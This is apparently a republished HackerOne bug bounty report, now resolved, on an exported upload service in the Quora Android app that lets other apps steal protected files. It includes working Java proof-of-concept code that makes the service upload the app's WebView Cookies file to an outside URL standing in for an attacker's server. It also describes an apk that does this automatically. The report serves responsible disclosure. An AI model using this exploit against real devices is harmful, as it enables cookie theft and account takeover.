Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

[Quora Android] Possible to steal arbitrary files from mobile device

Medium
Q
Quora
Submitted None
Actions:
View on HackerOne
Reported by bagipro

Vulnerability Details

Technical details and impact analysis

Information Disclosure
**Summary:** Service ```xml <service android:enabled="true" android:exported="true" android:name="net.gotev.uploadservice.UploadService"/> ``` enabled and exported. If it's exported, it means that any third party application can access it and send arbitrary data into it. The following code sends main database file to arbitrary server (I used http://google.com/zaheck): ```java UploadTaskParameters params = new UploadTaskParameters(); params.setId("1337"); params.setServerUrl("http://google.com/zaheck"); try { params.addFile(new UploadFile("/data/data/com.quora.android/app_webview/Cookies")); } catch(FileNotFoundException e) { throw new IllegalStateException(e); /* should be never thrown because not checked on the client side */ } Intent intent = new Intent("net.gotev.uploadservice.action.upload"); intent.setClassName("com.quora.android", "net.gotev.uploadservice.UploadService"); intent.putExtra("taskClass", "net.gotev.uploadservice.MultipartUploadTask"); intent.putExtra("multipartUtf8Charset", true); intent.putExtra("httpTaskParameters", new HttpUploadTaskParameters()); intent.putExtra("taskParameters", params); startService(intent); ``` In the result protected file ```/data/data/com.quora.android/app_webview/Cookies``` which is not accessible to any application besides yours is sent to the attacker. It's really serious vulnerability which allows to takeover accounts. It can be used by any third party installed application on the same device. On the newest Androids it also can be exploited via Instant Apps directly from a web-browser (installation of an app is not required). **Description (Include Impact):** I believe it's not your vulnerability, but the gotev's library you use. Anyway, attacker can steal files with settings, cookies (even httpOnly, it doesn't matter), google authorization token is stored in shared_prefs file, which also can be stolen PoC: {F211064} This file contain sensitive cookies {F211066} ### Steps To Reproduce I attached an apk file which sends ```/data/data/com.quora.android/app_webview/Cookies``` to http://google.com/zaheck Install apk and open it, file with all cookies will be sent automatically to attacker provided URL

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Information Disclosure